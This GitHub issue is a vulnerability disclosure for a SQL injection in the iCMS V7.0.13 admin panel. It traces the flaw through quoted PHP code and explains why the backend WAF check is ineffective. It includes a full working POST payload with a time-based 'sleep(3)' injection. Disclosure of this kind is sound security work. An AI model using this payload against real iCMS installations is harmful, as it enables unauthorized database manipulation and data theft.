Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

iCMS V7.0.13 Has A SQLi vulnerability in article.admincp.php #47

Closed
awindog opened this issue Jan 10, 2019 · 1 comment

Comments

@awindog
Copy link

commented Jan 10, 2019

The vulnerability is in background
default
In line 898,in this code ,we can contol $_data_id

    if($_POST['_data_id']){
        $_data_id = stripslashes($_POST['_data_id']);
        $_data_id = json_decode($_data_id,true);
        $_count   = count($_data_id);
    }

We can post data and due to stripslashes() ,we alse can post a ' successfully.
In line 930

        if(is_array($_data_id)){
            $dkey = array_search($adid, $_data_id);
            if($dkey!==false && $_chapter){//撤消章节时
                unset($_data_id[$dkey]);
                //删除章节
                if($_data_id)foreach ($_data_id as $_id) {
                    $_id && article::del_data($_id,'id');
                }
            }
        }

If $_data_id is a arary , $dkey!==false , $_chapter has a value that we can send $_id to article::del_data($_id,'id')

In article.class.php

public static function del_data($id,$f='aid'){
    iDB::query("DELETE FROM `#iCMS@__article_data` WHERE `$f`='$id'");
}

And the public function article_data() used in public function do_save() in line 751 $url OR $this->article_data($body,$aid,$haspic,$_chapter);
we can find that $dkey = array_search($adid, $_data_id);,we don't know the $adid,but we can post a many data to bypass this ,like "1":"1","2":"2"......"1000":"1000"
And the $_chapter,$_chapter = (int)$_POST['chapter'];,we can send chapter=1 to bypass.
so that the final payload is
_cid=&_scid=&_tags=&_pid=&_data_id=&article_id=0&userid=1&ucid=&postype=1&REFERER=http%3A%2F%2Flocalhost%2FiCMSv7013%2Fadmincp.php%3Fapp%3Darticle%26do%3Dtrash&chapter=1&markdown=0&cid=1&status=1&scid%5B%5D=1&pid%5B%5D=0&title=aaaaa&stitle=aa&source=&author=&editor=iCMS&pic=&mpic=&spic=&keywords=&tags=a&description=a&data_id=&subtitle=&autopic=1&body%5B%5D=%3Cp%3Eaaaaaaaaaaaaa%3Cbr%2F%3E%3C%2Fp%3E&pubdate=2019-01-05+14%3A04%3A14&sortnum=1546668254&weight=1546668254&hits=0&hits_today=0&hits_yday=0&hits_week=0&hits_month=0&favorite=0&comments=0&good=0&bad=0&tpl=&clink=&url=&_data_id={"1":"1","2":"2"......"1000":"1000","1001":"1' and sleep (3)%23"}

And another very very very very very import problem is that in admincp.php ,define('iPHP_WAF_POST',false); but in IWAF.class.php,you use defined('iPHP_WAF_POST') OR define('iPHP_WAF_POST',true);,but this place use defined('iPHP_WAF_POST') of course return ture ,that mean this WAF in background is no any use!!!!!!!!!!!!so that I can use sleep(3) and continue injecting.

author by leo.ye@dbappsecurity.com.cn

@idreamsoft

This comment has been minimized.

Copy link
Owner

commented Jan 10, 2019

Thank you, we will fix it as soon as possible

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
2 participants
You can’t perform that action at this time.